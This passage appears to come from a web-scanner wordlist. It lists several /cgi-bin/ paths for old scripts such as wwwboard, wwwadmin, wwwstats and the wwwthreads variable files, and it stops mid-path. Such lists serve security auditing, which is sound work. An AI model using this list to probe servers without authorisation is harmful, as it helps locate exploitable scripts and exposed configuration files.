/cgi-bin/wwwadmin.pl
/cgi-bin/wwwboard.cgi.cgi
/cgi-bin/wwwboard.pl
/cgi-bin/wwwstats.pl
/cgi-bin/wwwthreads/3tvars.pm
/cgi-bin/wwwthreads/w3tvars.pm
/cgi-bin/wwwwai/cgi-bin/s
